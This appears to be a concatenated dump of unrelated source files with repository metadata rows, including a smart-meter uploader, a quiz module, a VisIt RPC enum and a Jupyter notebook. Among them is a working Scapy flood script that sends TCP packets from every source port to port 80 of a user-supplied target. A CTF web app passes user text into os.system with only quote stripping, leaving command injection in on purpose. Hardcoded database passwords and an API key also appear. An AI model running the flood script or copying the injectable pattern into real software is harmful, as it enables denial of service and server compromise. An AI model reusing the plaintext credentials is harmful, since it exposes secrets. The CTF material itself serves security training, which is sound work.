] | null | null | null | bin/write2cly.py | docdiesel/smartmetertools | 3b7449c7a9069696af078631aa5440f53d0f57bc | [
"MIT"
] | null | null | null | #!/usr/bin/python3
## write2cly.py - reads json (generated by sml_reader.py) from stdin
## - writes values to Corlysis time series InfluxDB
##
## Writes data from smart meter to time series database (InfluxDB)
## at Corlysis.com [1]. You need to configure your database and token
## in the config section.
##
## [1] https://corlysis.com/
##==== license section ========
## This code is under MIT License: Copyright (C) 2019 Bernd Künnen
## License details see https://choosealicense.com/licenses/mit/
##==== config section ========
# define corlysis settings here - set db and token at least
cly_base_url = 'https://corlysis.com:8086/write'
cly_parameters = {
"db": "energy",
"u" : "token",
"p" : "placeyourtokenhere",
"precision": "ms"}
# assign readable field names
config = {
"1.8.0": "Bezug",
"2.8.0": "Einspeisung",
"16.7.0": "Wirkleistung"
}
##==== code section ==== no need to change lines below ====
##-- import libraries
import json, sys, requests
import requests
import time
# load json from stdin
try:
myjson = json.load(sys.stdin)
except:
sys.stderr.write('!! error loading json')
exit(1)
# decode json
try:
line = "meter_data "
# add each meter value to line
for obis in myjson['data']:
key = config[obis] # set human readable field name
value = myjson['data'][obis] # get value from smart meter
line += key + '=' + str(value) + ',' # add key=value to insert line
# cut off last comma
line = line[:-1]
# add timestamp as unix timestamp in ms
line += ' ' + str(int(time.time()*1000)) #+ '\n'
# post data into time series database; http response should be 204
r = requests.post(cly_base_url, params=cly_parameters, data=line)
if r.status_code != 204 :
    sys.stderr.write(str(r.status_code))
    sys.stderr.write(str(r.content))
# catch if input is no valid json
except:
sys.stderr.write('!!error: no data block in json')
exit(2)
| 25.526316 | 71 | 0.652062 |
53df3216d619040fc2551d1e35eda4fe2e177604 | 3,868 | py | Python | WifiEnigma/BattleAI/question.py | Puzzlebox-IMT/Puzzlebox | 6b80e22a4aee3228140692bd6352de18b2f6a96d | [
"MIT"
] | null | null | null | WifiEnigma/BattleAI/question.py | Puzzlebox-IMT/Puzzlebox | 6b80e22a4aee3228140692bd6352de18b2f6a96d | [
"MIT"
] | null | null | null | WifiEnigma/BattleAI/question.py | Puzzlebox-IMT/Puzzlebox | 6b80e22a4aee3228140692bd6352de18b2f6a96d | [
"MIT"
] | null | null | null | import mysql.connector
import random
from voice import synthetize_voice, delete_wav
def AllQuestionAI(id_theme):
i = 0
    # CONNECT TO THE DATABASE
conn = mysql.connector.connect(host="localhost",
user="phpmyadmin", password="Vince@Mysql1997",
database="Puzzlebox")
cursor = conn.cursor()
    # RUN THE QUERY ON THE DATABASE
query = ("SELECT * FROM Question INNER JOIN themes_questions ON Question.ID_QUESTION = themes_questions.ID_QUESTION WHERE ID_THEME=%s")
cursor.execute(query, (id_theme, ))
    # FETCH THE RESULTS
rows = cursor.fetchall()
if rows:
for line in rows:
i += 1
enonce = line[1]
proposition1 = line[2]
proposition2 = line[3]
proposition3 = line[4]
proposition4 = line[5]
reponse = line[5]
print("*******************************************************************************")
print(" QUESTION ",i," ")
print("*******************************************************************************")
print("ENONCE : ", enonce)
print("PROPOSITION 1 : ", proposition1)
print("PROPOSITION 2 : ", proposition2)
print("PROPOSITION 3 : ", proposition3)
print("PROPOSITION 4 : ", proposition4)
print("REPONSE : ", reponse)
else:
print("Ce thème ne contient pas de questions")
def questionAI(id_theme):
i = 0
    # CONNECT TO THE DATABASE
conn = mysql.connector.connect(host="localhost",
user="phpmyadmin", password="Vince@Mysql1997",
database="Puzzlebox")
cursor = conn.cursor()
    # RUN THE QUERY ON THE DATABASE
query = ("SELECT * FROM Question INNER JOIN themes_questions ON Question.ID_QUESTION = themes_questions.ID_QUESTION WHERE ID_THEME=%s")
cursor.execute(query, (id_theme, ))
    # FETCH THE RESULTS
rows = cursor.fetchall()
if rows:
nb_rows = len(rows)
num_question = random.randint(1, nb_rows)
        # List indices start at zero, so shift the drawn number down by one
num_question = num_question - 1
question = rows[num_question]
        result = [] # List which stores the selected question's fields
        # EXTRACT THE TUPLE FIELDS
result.append(question[1])
result.append(question[2])
result.append(question[3])
result.append(question[4])
result.append(question[5])
result.append(question[5]) #This last one is the answer
print("*******************************************************************************")
print(" QUESTION ",num_question+1," ")
print("*******************************************************************************")
print("ENONCE : ", result[0])
print("PROPOSITION 1 : ", result[1])
print("PROPOSITION 2 : ", result[2])
print("PROPOSITION 3 : ", result[3])
print("PROPOSITION 4 : ", result[4])
print("REPONSE : ", result[5])
#complete_question = ''.join(complete_question) #Convert tuple into string
return result
else:
print("Ce thème ne contient pas de questions")
def tell_question(question):
synthetize_voice(question[0])
for i in range(1,5) :
num_prop = "Proposition {} ".format(i)
num_prop = ''.join(num_prop)
line = ''.join(question[i])
line = num_prop + line
synthetize_voice(line)
delete_wav()
def quiz():
counter = 1
    while(counter <= 5):
        questionAI(1)
        counter += 1
if (__name__ == '__main__'):
result = questionAI(1)
tell_question(result)
| 31.447154 | 140 | 0.520941 |
54e3b8446107d9bccd2d0bc314395d7a3117387b | 7,069 | py | Python | src/resources/clients/python_client/visitstate.py | visit-dav/vis | c08bc6e538ecd7d30ddc6399ec3022b9e062127e | [
"BSD-3-Clause"
] | 226 | 2018-12-29T01:13:49.000Z | 2022-03-30T19:16:31.000Z | src/resources/clients/python_client/visitstate.py | visit-dav/vis | c08bc6e538ecd7d30ddc6399ec3022b9e062127e | [
"BSD-3-Clause"
] | 5,100 | 2019-01-14T18:19:25.000Z | 2022-03-31T23:08:36.000Z | src/resources/clients/python_client/visitstate.py | visit-dav/vis | c08bc6e538ecd7d30ddc6399ec3022b9e062127e | [
"BSD-3-Clause"
] | 84 | 2019-01-24T17:41:50.000Z | 2022-03-10T10:01:46.000Z | import sys
class RPCType(object):
CloseRPC = 0
DetachRPC = 1
AddWindowRPC = 2
DeleteWindowRPC = 3
SetWindowLayoutRPC = 4
SetActiveWindowRPC = 5
ClearWindowRPC = 6
ClearAllWindowsRPC = 7
OpenDatabaseRPC = 8
CloseDatabaseRPC = 9
ActivateDatabaseRPC = 10
CheckForNewStatesRPC = 11
CreateDatabaseCorrelationRPC = 12
AlterDatabaseCorrelationRPC = 13
DeleteDatabaseCorrelationRPC = 14
ReOpenDatabaseRPC = 15
ReplaceDatabaseRPC = 16
OverlayDatabaseRPC = 17
OpenComputeEngineRPC = 18
CloseComputeEngineRPC = 19
AnimationSetNFramesRPC = 20
AnimationPlayRPC = 21
AnimationReversePlayRPC = 22
AnimationStopRPC = 23
TimeSliderNextStateRPC = 24
TimeSliderPreviousStateRPC = 25
SetTimeSliderStateRPC = 26
SetActiveTimeSliderRPC = 27
AddPlotRPC = 28
SetPlotFrameRangeRPC = 29
DeletePlotKeyframeRPC = 30
MovePlotKeyframeRPC = 31
DeleteActivePlotsRPC = 32
HideActivePlotsRPC = 33
DrawPlotsRPC = 34
DisableRedrawRPC = 35
RedrawRPC = 36
SetActivePlotsRPC = 37
ChangeActivePlotsVarRPC = 38
AddOperatorRPC = 39
AddInitializedOperatorRPC = 40
PromoteOperatorRPC = 41
DemoteOperatorRPC = 42
RemoveOperatorRPC = 43
RemoveLastOperatorRPC = 44
RemoveAllOperatorsRPC = 45
SaveWindowRPC = 46
SetDefaultPlotOptionsRPC = 47
SetPlotOptionsRPC = 48
SetDefaultOperatorOptionsRPC = 49
SetOperatorOptionsRPC = 50
WriteConfigFileRPC = 51
ConnectToMetaDataServerRPC = 52
IconifyAllWindowsRPC = 53
DeIconifyAllWindowsRPC = 54
ShowAllWindowsRPC = 55
HideAllWindowsRPC = 56
UpdateColorTableRPC = 57
SetAnnotationAttributesRPC = 58
SetDefaultAnnotationAttributesRPC = 59
ResetAnnotationAttributesRPC = 60
SetKeyframeAttributesRPC = 61
SetPlotSILRestrictionRPC = 62
SetViewAxisArrayRPC = 63
SetViewCurveRPC = 64
SetView2DRPC = 65
SetView3DRPC = 66
ResetPlotOptionsRPC = 67
ResetOperatorOptionsRPC = 68
SetAppearanceRPC = 69
ProcessExpressionsRPC = 70
SetLightListRPC = 71
SetDefaultLightListRPC = 72
ResetLightListRPC = 73
SetAnimationAttributesRPC = 74
SetWindowAreaRPC = 75
PrintWindowRPC = 76
ResetViewRPC = 77
RecenterViewRPC = 78
ToggleAllowPopupRPC = 79
ToggleMaintainViewModeRPC = 80
ToggleBoundingBoxModeRPC = 81
ToggleCameraViewModeRPC = 82
TogglePerspectiveViewRPC = 83
ToggleSpinModeRPC = 84
ToggleLockTimeRPC = 85
ToggleLockToolsRPC = 86
ToggleLockViewModeRPC = 87
ToggleFullFrameRPC = 88
UndoViewRPC = 89
RedoViewRPC = 90
InvertBackgroundRPC = 91
ClearPickPointsRPC = 92
SetWindowModeRPC = 93
EnableToolRPC = 94
SetToolUpdateModeRPC = 95
CopyViewToWindowRPC = 96
CopyLightingToWindowRPC = 97
CopyAnnotationsToWindowRPC = 98
CopyPlotsToWindowRPC = 99
ClearCacheRPC = 100
ClearCacheForAllEnginesRPC = 101
SetViewExtentsTypeRPC = 102
ClearRefLinesRPC = 103
SetRenderingAttributesRPC = 104
QueryRPC = 105
CloneWindowRPC = 106
SetMaterialAttributesRPC = 107
SetDefaultMaterialAttributesRPC = 108
ResetMaterialAttributesRPC = 109
SetPlotDatabaseStateRPC = 110
DeletePlotDatabaseKeyframeRPC = 111
MovePlotDatabaseKeyframeRPC = 112
ClearViewKeyframesRPC = 113
DeleteViewKeyframeRPC = 114
MoveViewKeyframeRPC = 115
SetViewKeyframeRPC = 116
OpenMDServerRPC = 117
EnableToolbarRPC = 118
HideToolbarsRPC = 119
HideToolbarsForAllWindowsRPC = 120
ShowToolbarsRPC = 121
ShowToolbarsForAllWindowsRPC = 122
SetToolbarIconSizeRPC = 123
SaveViewRPC = 124
SetGlobalLineoutAttributesRPC = 125
SetPickAttributesRPC = 126
ExportColorTableRPC = 127
ExportEntireStateRPC = 128
ImportEntireStateRPC = 129
ImportEntireStateWithDifferentSourcesRPC = 130
ResetPickAttributesRPC = 131
AddAnnotationObjectRPC = 132
HideActiveAnnotationObjectsRPC = 133
DeleteActiveAnnotationObjectsRPC = 134
RaiseActiveAnnotationObjectsRPC = 135
LowerActiveAnnotationObjectsRPC = 136
SetAnnotationObjectOptionsRPC = 137
SetDefaultAnnotationObjectListRPC = 138
ResetAnnotationObjectListRPC = 139
ResetPickLetterRPC = 140
SetDefaultPickAttributesRPC = 141
ChooseCenterOfRotationRPC = 142
SetCenterOfRotationRPC = 143
SetQueryOverTimeAttributesRPC = 144
SetDefaultQueryOverTimeAttributesRPC = 145
ResetQueryOverTimeAttributesRPC = 146
ResetLineoutColorRPC = 147
SetInteractorAttributesRPC = 148
SetDefaultInteractorAttributesRPC = 149
ResetInteractorAttributesRPC = 150
GetProcInfoRPC = 151
SendSimulationCommandRPC = 152
UpdateDBPluginInfoRPC = 153
ExportDBRPC = 154
SetTryHarderCyclesTimesRPC = 155
OpenClientRPC = 156
OpenGUIClientRPC = 157
OpenCLIClientRPC = 158
SuppressQueryOutputRPC = 159
SetQueryFloatFormatRPC = 160
SetMeshManagementAttributesRPC = 161
SetDefaultMeshManagementAttributesRPC = 162
ResetMeshManagementAttributesRPC = 163
ResizeWindowRPC = 164
MoveWindowRPC = 165
MoveAndResizeWindowRPC = 166
SetStateLoggingRPC = 167
ConstructDataBinningRPC = 168
RequestMetaDataRPC = 169
SetTreatAllDBsAsTimeVaryingRPC = 170
SetCreateMeshQualityExpressionsRPC = 171
SetCreateTimeDerivativeExpressionsRPC = 172
SetCreateVectorMagnitudeExpressionsRPC = 173
CopyActivePlotsRPC = 174
SetPlotFollowsTimeRPC = 175
TurnOffAllLocksRPC = 176
SetDefaultFileOpenOptionsRPC = 177
SetSuppressMessagesRPC = 178
ApplyNamedSelectionRPC = 179
CreateNamedSelectionRPC = 180
DeleteNamedSelectionRPC = 181
LoadNamedSelectionRPC = 182
SaveNamedSelectionRPC = 183
SetNamedSelectionAutoApplyRPC = 184
UpdateNamedSelectionRPC = 185
InitializeNamedSelectionVariablesRPC = 186
MenuQuitRPC = 187
SetPlotDescriptionRPC = 188
MovePlotOrderTowardFirstRPC = 189
MovePlotOrderTowardLastRPC = 190
SetPlotOrderToFirstRPC = 191
SetPlotOrderToLastRPC = 192
RenamePickLabelRPC = 193
GetQueryParametersRPC = 194
DDTConnectRPC = 195
DDTFocusRPC = 196
ReleaseToDDTRPC = 197
MaxRPC = 198
| 34.651961 | 54 | 0.660914 |
4ad523fc14942dd490ad41c526c6171f60967ac3 | 476 | py | Python | Backend/models/risklayerPrognosis.py | dbvis-ukon/coronavis | f00374ac655c9d68541183d28ede6fe5536581dc | [
"Apache-2.0"
] | 15 | 2020-04-24T20:18:11.000Z | 2022-01-31T21:05:05.000Z | Backend/models/risklayerPrognosis.py | dbvis-ukon/coronavis | f00374ac655c9d68541183d28ede6fe5536581dc | [
"Apache-2.0"
] | 2 | 2021-05-19T07:15:09.000Z | 2022-03-07T08:29:34.000Z | Backend/models/risklayerPrognosis.py | dbvis-ukon/coronavis | f00374ac655c9d68541183d28ede6fe5536581dc | [
"Apache-2.0"
] | 4 | 2020-04-27T16:20:13.000Z | 2021-02-23T10:39:42.000Z | from db import db
class RisklayerPrognosis(db.Model):
__tablename__ = 'risklayer_prognosis'
datenbestand = db.Column(db.TIMESTAMP, primary_key=True, nullable=False)
prognosis = db.Column(db.Float, nullable=False)
# class RisklayerPrognosisSchema(SQLAlchemyAutoSchema):
# class Meta:
# strict = True
# model = RisklayerPrognosis
#
# timestamp = fields.Timestamp(data_key="datenbestand")
# prognosis = fields.Number(data_key="prognosis")
| 28 | 76 | 0.72479 |
ab2add18b201d727e235b13fba3fa52b34c35680 | 404 | py | Python | TreeModelLib/BelowgroundCompetition/__init__.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | TreeModelLib/BelowgroundCompetition/__init__.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | TreeModelLib/BelowgroundCompetition/__init__.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 8 15:25:03 2018
@author: bathmann
"""
from .BelowgroundCompetition import BelowgroundCompetition
from .SimpleTest import SimpleTest
from .FON import FON
from .OGSWithoutFeedback import OGSWithoutFeedback
from .OGSLargeScale3D import OGSLargeScale3D
from .OGS.helpers import CellInformation
from .FixedSalinity import FixedSalinity
| 25.25 | 58 | 0.799505 |
dbcc6f4ccb0dabce5252e1dd4108228b2c863f99 | 721 | py | Python | web/web-lemonthinker/src/app/app.py | NoXLaw/RaRCTF2021-Challenges-Public | 1a1b094359b88f8ebbc83a6b26d27ffb2602458f | [
"MIT"
] | 2 | 2021-08-09T17:08:12.000Z | 2021-08-09T17:08:17.000Z | web/web-lemonthinker/src/app/app.py | NoXLaw/RaRCTF2021-Challenges-Public | 1a1b094359b88f8ebbc83a6b26d27ffb2602458f | [
"MIT"
] | null | null | null | web/web-lemonthinker/src/app/app.py | NoXLaw/RaRCTF2021-Challenges-Public | 1a1b094359b88f8ebbc83a6b26d27ffb2602458f | [
"MIT"
] | 1 | 2021-10-09T16:51:56.000Z | 2021-10-09T16:51:56.000Z | from flask import Flask, request, redirect, url_for
import os
import random
import string
import time # lemonthink
clean = time.time()
app = Flask(__name__)
chars = list(string.ascii_letters + string.digits)
@app.route('/')
def main():
return open("index.html").read()
@app.route('/generate', methods=['POST'])
def upload():
global clean
if time.time() - clean > 60:
os.system("rm static/images/*")
clean = time.time()
text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")
return redirect(url_for('static', filename='images/' + filename), code=301) | 28.84 | 79 | 0.653259 |
91da549f96f9ccca48e20a796a48546be83febae | 206 | py | Python | exercises/ja/exc_03_16_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 2,085 | 2019-04-17T13:10:40.000Z | 2022-03-30T21:51:46.000Z | exercises/ja/exc_03_16_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 79 | 2019-04-18T14:42:55.000Z | 2022-03-07T08:15:43.000Z | exercises/ja/exc_03_16_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 361 | 2019-04-17T13:34:32.000Z | 2022-03-28T04:42:45.000Z | import spacy
nlp = spacy.load("ja_core_news_sm")
text = (
"チックフィレイはジョージア州カレッジパークに本社を置く、"
"チキンサンドを専門とするアメリカのファストフードレストランチェーンです。"
)
# Only tokenize the text
doc = nlp(text)
print([token.text for token in doc])
| 17.166667 | 42 | 0.73301 |
f482d9773506167246440d9307b62395f61caa1a | 2,353 | py | Python | ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py | Jimmy01240397/balsn-2021-writeup | 91b71dfbddc1c214552280b12979a82ee1c3cb7e | [
"MIT"
] | null | null | null | ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py | Jimmy01240397/balsn-2021-writeup | 91b71dfbddc1c214552280b12979a82ee1c3cb7e | [
"MIT"
] | null | null | null | ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py | Jimmy01240397/balsn-2021-writeup | 91b71dfbddc1c214552280b12979a82ee1c3cb7e | [
"MIT"
] | null | null | null | from problem import Problem
from typing import Any, Tuple
from random import randint
import ast
import json
def gen_num():
return str(randint(1, 9))
def gen_op():
return "+-*/"[randint(0, 3)]
def gen_expr(depth):
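    # Randomly recurse with probability 1/(depth+1), so expressions stay finite;
    # otherwise emit a single random digit as a leaf.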
if randint(0, depth) == 0:
l = gen_expr(depth + 1)
r = gen_expr(depth + 1)
op = gen_op()
return f"({l}{op}{r})"
return f"({gen_num()})"
class ASTMath(Problem):
@property
def name(self) -> str:
return "AST Math"
@property
def desciption(self) -> str:
return """
Input: An AST of Python's arithmetic expression (only +,-,*,/)
Output: Result number
Examples:
Input: {"body": {"left": {"value": 1, "kind": null, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 1}, "op": "<_ast.Add object at 0x7f0387ccde20>", "right": {"value": 2, "kind": null, "lineno": 1, "col_offset": 2, "end_lineno": 1, "end_col_offset": 3}, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 3}}
Output: 3
Input: {"body": {"left": {"left": {"value": 8, "kind": null, "lineno": 1, "col_offset": 1, "end_lineno": 1, "end_col_offset": 2}, "op": "<_ast.Mult object at 0x7f20eb76aee0>", "right": {"value": 7, "kind": null, "lineno": 1, "col_offset": 3, "end_lineno": 1, "end_col_offset": 4}, "lineno": 1, "col_offset": 1, "end_lineno": 1, "end_col_offset": 4}, "op": "<_ast.Sub object at 0x7f20eb76ae80>", "right": {"left": {"value": 6, "kind": null, "lineno": 1, "col_offset": 7, "end_lineno": 1, "end_col_offset": 8}, "op": "<_ast.Mult object at 0x7f20eb76aee0>", "right": {"value": 3, "kind": null, "lineno": 1, "col_offset": 9, "end_lineno": 1, "end_col_offset": 10}, "lineno": 1, "col_offset": 7, "end_lineno": 1, "end_col_offset": 10}, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 11}}
Output: 38
"""
@property
def rounds(self) -> int:
return 10
def dumps(self, x):
return json.dumps(
x, default=lambda x: x.__dict__ if len(x.__dict__) else str(x)
)
def generate_testcase(self) -> Tuple[bool, Any]:
l = gen_expr(1)
r = gen_expr(1)
op = gen_op()
expr = f"{l}{op}{r}"
try:
result = eval(expr)
except ZeroDivisionError:
return self.generate_testcase()
return ast.parse(expr, mode="eval"), result
| 37.349206 | 800 | 0.592435 |
beaa8784fc43c71bc8bb5120744ac9a157c4e2a7 | 2,387 | py | Python | PathPlanning/run.py | CandleStein/VAlg | 43aecdd351954d316f132793cf069b70bf2e5cc2 | [
"MIT"
] | null | null | null | PathPlanning/run.py | CandleStein/VAlg | 43aecdd351954d316f132793cf069b70bf2e5cc2 | [
"MIT"
] | null | null | null | PathPlanning/run.py | CandleStein/VAlg | 43aecdd351954d316f132793cf069b70bf2e5cc2 | [
"MIT"
] | 1 | 2020-09-25T18:31:34.000Z | 2020-09-25T18:31:34.000Z | from planning_framework import path
import cv2 as cv
import numpy as np
import argparse
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description="Path Planning Visualisation")
parser.add_argument(
"-n",
"--n_heuristic",
default=2,
help="Heuristic for A* Algorithm (default = 2). 0 for Dijkstra's Algorithm",
)
args = parser.parse_args()
N_H = int(args.n_heuristic)
drawing = False # true if mouse is pressed
mode = "obs" # if True, draw rectangle. Press 'm' to toggle to curve
ix, iy = -1, -1
sx, sy = 0, 0
dx, dy = 50, 50
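# Three interactive windows follow: first draw obstacles on the occupancy map,
# then click the start point, then the end point; press Esc to move past each window.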
# mouse callback function
def draw(event, x, y, flags, param):
global mode, sx, sy, dx, dy, drawing
if event == cv.EVENT_LBUTTONDOWN:
drawing = True
elif event == cv.EVENT_MOUSEMOVE:
if drawing == True:
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif event == cv.EVENT_LBUTTONUP:
drawing = False
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif mode == "src":
cv.circle(img, (x, y), 5, (255, 0, 0), -1)
sx, sy = x, y
elif mode == "dst":
cv.circle(img, (x, y), 5, (0, 255, 0), -1)
dx, dy = x, y
img = np.zeros((512, 512, 3), np.uint8)
inv_im = np.ones(img.shape) * 255
cv.namedWindow("Draw the Occupancy Map")
cv.setMouseCallback("Draw the Occupancy Map", draw)
while 1:
cv.imshow("Draw the Occupancy Map", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
mode = "src"
img_ = img
cv.namedWindow("Set the Starting Point")
cv.setMouseCallback("Set the Starting Point", draw)
while 1:
cv.imshow("Set the Starting Point", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
# cv.waitKey(20)
cv.destroyAllWindows()
mode = "dst"
end = "Set the End Point"
cv.namedWindow(end)
cv.setMouseCallback(end, draw)
while cv.getWindowProperty(end, 0) >= 0:
cv.imshow(end, inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
img = cv.resize(img_, (50, 50), interpolation=cv.INTER_AREA)
inv_img = np.ones(img.shape)
np.savetxt("map.txt", np.array(img[:, :, 0]))
plt.imshow(inv_img - img)
start = np.array([sx, sy]) * 50 // 512
end = np.array([dx, dy]) * 50 // 512
path(start, end, N_H)
| 26.820225 | 86 | 0.607038 |
fe7996f8bc015e9c1e0a7458bde9909f14df8fbf | 316 | py | Python | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | null | null | null | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z | from scapy.all import *
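# Flood loop: for every source port, build an IP/TCP packet (Scapy's TCP layer
# defaults to the SYN flag) aimed at port 80 of the target and send it with a
# ~0.1 ms inter-packet delay.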
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1 | 22.571429 | 42 | 0.550633 |
a3b8b5beaa0f8d8ecd98462fe75b978547dc1472 | 4,248 | py | Python | Python X/Dictionaries in python.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | [
"MIT"
] | null | null | null | Python X/Dictionaries in python.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | [
"MIT"
] | null | null | null | Python X/Dictionaries in python.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | [
"MIT"
] | null | null | null | {
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"# dictionaries, look-up tables & key-value pairs\n",
"# d = {} OR d = dict()\n",
"# e.g. d = {\"George\": 24, \"Tom\": 32}\n",
"\n",
"d = {}\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"d[\"George\"] = 24"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"d[\"Tom\"] = 32\n",
"d[\"Jenny\"] = 16"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"{'George': 24, 'Tom': 32, 'Jenny': 16}\n"
]
}
],
"source": [
"print(d)"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'Jenny' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-5-0bdfff196d23>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mprint\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0md\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mJenny\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
"\u001b[0;31mNameError\u001b[0m: name 'Jenny' is not defined"
]
}
],
"source": [
"print(d[Jenny])"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"32\n"
]
}
],
"source": [
"print(d[\"Tom\"])"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [],
"source": [
"d[\"Jenny\"] = 20"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"20\n"
]
}
],
"source": [
"print(d[\"Jenny\"])"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [],
"source": [
"# keys are strings or numbers \n",
"\n",
"d[10] = 100"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"100\n"
]
}
],
"source": [
"print(d[10])"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [],
"source": [
"# how to iterate over key-value pairs"
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"key:\n",
"George\n",
"value:\n",
"24\n",
"\n",
"key:\n",
"Tom\n",
"value:\n",
"32\n",
"\n",
"key:\n",
"Jenny\n",
"value:\n",
"20\n",
"\n",
"key:\n",
"10\n",
"value:\n",
"100\n",
"\n"
]
}
],
"source": [
" for key, value in d.items():\n",
" print(\"key:\")\n",
" print(key)\n",
" print(\"value:\")\n",
" print(value)\n",
" print(\"\")"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.6"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| 18.88 | 354 | 0.439266 |
4367a493fbe503c8a8ff6c69a39f88b75c5407aa | 125 | py | Python | kts/core/types.py | konodyuk/kts | 3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7 | [
"MIT"
] | 18 | 2019-02-14T13:10:07.000Z | 2021-11-26T07:10:13.000Z | kts/core/types.py | konodyuk/kts | 3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7 | [
"MIT"
] | 2 | 2019-02-17T14:06:42.000Z | 2019-09-15T18:05:54.000Z | kts/core/types.py | konodyuk/kts | 3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7 | [
"MIT"
] | 2 | 2019-09-15T13:12:42.000Z | 2020-04-15T14:05:54.000Z | from typing import Union
import pandas as pd
from kts.core.frame import KTSFrame
AnyFrame = Union[pd.DataFrame, KTSFrame]
| 15.625 | 40 | 0.792 |
717864c0c5586a731d9e7b34b779d6af81159c7a | 4,509 | py | Python | slcyGeneral.py | mirrorcoloured/slcypi | c47975b3523f770d12a521c82e2dfca181e3f35b | [
"MIT"
] | null | null | null | slcyGeneral.py | mirrorcoloured/slcypi | c47975b3523f770d12a521c82e2dfca181e3f35b | [
"MIT"
] | null | null | null | slcyGeneral.py | mirrorcoloured/slcypi | c47975b3523f770d12a521c82e2dfca181e3f35b | [
"MIT"
] | null | null | null | # Python 2.7.1
import RPi.GPIO as GPIO
from twython import Twython
import time
import sys
import os
import pygame
APP_KEY='zmmlyAJzMDIntLpDYmSH98gbw'
